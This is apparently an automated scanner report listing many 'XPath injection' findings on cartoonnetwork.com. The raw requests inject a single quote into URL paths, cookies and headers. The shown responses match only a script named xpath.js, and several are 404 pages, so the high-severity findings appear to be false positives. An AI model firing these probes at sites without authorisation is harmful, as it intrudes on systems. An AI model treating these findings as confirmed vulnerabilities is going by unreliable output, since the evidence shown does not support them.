<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.76. http://www.cartoonnetwork.com/legal/trademark.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /legal/trademark.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /legal/trademark.html' HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:01:38 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.77. http://www.cartoonnetwork.com/profiles/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles'/ HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:01:32 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.78. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [1401316autoFreqCap cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Able/Achilles/Aviator/index.html

Issue detail

The 1401316autoFreqCap cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the 1401316autoFreqCap cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Able/Achilles/Aviator/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0'; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:20 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:01:07 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43074
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.79. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [JSESSIONID cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Able/Achilles/Aviator/index.html

Issue detail

The JSESSIONID cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the JSESSIONID cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Able/Achilles/Aviator/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290'; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:14 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:01:05 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43074
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.80. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Able/Achilles/Aviator/index.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles'/Able/Achilles/Aviator/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:00:25 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.81. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Able/Achilles/Aviator/index.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Able'/Achilles/Aviator/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:00:28 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.82. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Able/Achilles/Aviator/index.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Able/Achilles'/Aviator/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:00:31 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.83. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Able/Achilles/Aviator/index.html

Issue detail

The REST URL parameter 4 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 4, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Able/Achilles/Aviator'/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:00:34 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.84. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Able/Achilles/Aviator/index.html

Issue detail

The REST URL parameter 5 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 5, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Able/Achilles/Aviator/index.html' HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:00:37 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.85. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Able/Achilles/Aviator/index.html

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Able/Achilles/Aviator/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;
Referer: http://www.google.com/search?hl=en&q='

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:24 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:01:07 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43074
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.86. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Able/Achilles/Aviator/index.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Able/Achilles/Aviator/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:24 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:01:06 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43074
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.87. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [adDEmas cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Able/Achilles/Aviator/index.html

Issue detail

The adDEmas cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the adDEmas cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Able/Achilles/Aviator/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&';

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:22 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:01:07 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43074
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.88. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [adDEon cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Able/Achilles/Aviator/index.html

Issue detail

The adDEon cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the adDEon cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Able/Achilles/Aviator/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true'; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:20 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:01:07 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43074
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.89. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Able/Achilles/Aviator/index.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Able/Achilles/Aviator/index.html?1'=1 HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:23 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:01:07 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43074
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.90. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [route cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Able/Achilles/Aviator/index.html

Issue detail

The route cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the route cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Able/Achilles/Aviator/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3'; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:15 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:01:06 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43074
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.91. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [s_cc cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Able/Achilles/Aviator/index.html

Issue detail

The s_cc cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_cc cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Able/Achilles/Aviator/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true'; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:15 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:01:07 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43074
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.92. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [s_sq cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Able/Achilles/Aviator/index.html

Issue detail

